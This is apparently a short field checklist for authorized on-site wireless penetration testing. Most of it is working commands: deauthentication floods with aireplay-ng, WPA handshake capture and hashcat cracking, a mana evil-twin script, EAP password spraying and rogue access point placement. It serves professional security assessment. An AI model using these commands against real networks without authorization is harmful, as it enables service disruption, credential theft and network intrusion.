Make sure you have everything you’ll need, since these always need to be on-site.
- Computer (even better to bring more than 1), with Kali Linux installed
- Power cords
- WiFi Card(s) – at least 1 since they don’t like to work when they need to
- Different antennas
- MiFi, since they’re probably not going to let you on the network so easily
- USB Hub, as the wireless card might need extra power
- OEM power cords
- Power strip – there’s a lot to plug in
That’s a good start.
Thanks to Ted Raffle for this writeup.
Start up Kali, plug in the card, run iwconfig to see whether it is connected
Get rid of unnecessary processes: airmon-ng check kill
Start the interface: airmon-ng start wlan0
To see networks and their MAC: airodump-ng –band abg -cswitch 1 wlan0mon
If you need to de-auth: aireplay-ng –deauth <number of packets or 0 for infinite> -a [MAC of AP] -c [MAC of client] wlan0mon
Capture a PSK: airodump-ng wlan0mon -c 1 –bssid [MAC of AP] –write <filename>
Turn handshake value into a hashcat value: wpaclean clean.cap <filename>-01.cap
And: aircrack-ng clean.cap -J hccap
hashcat -m 2500 hccap.hccap -w wordlist rules/rule
Have mana installed
Use Nick Sanzotta’s “manaSucks” script:
python manaSucks.py -iwlan0mon -m=<fake MAC address> –hostname ‘anything’ -s<SSID> -c6 –manaloud=0
For brute forcing the EAP network, get usernames, either also from Nick Sanzotta’s WiFiSuite, or from evil twin, or from scraping, use WiFiSuite:
python wifisuite.py -iwlan0mon -s”<SSID>” -u <username file> -p<password> spray
If you get guest network access, test for network segmentation. nmap the neighborhood looking for “up” hosts. If there are any, nmap them for services. Also check for nameservers.
If you get on the corporate network with credentials, it’s essentially now an internal assessment. Pick something to show risk and move on. After all, it’s a wireless assessment.
Test outside the building for access
Plug in a wifi repeater/AP, is it detected? Are there network access controls? (Probably not, and now you have internal access)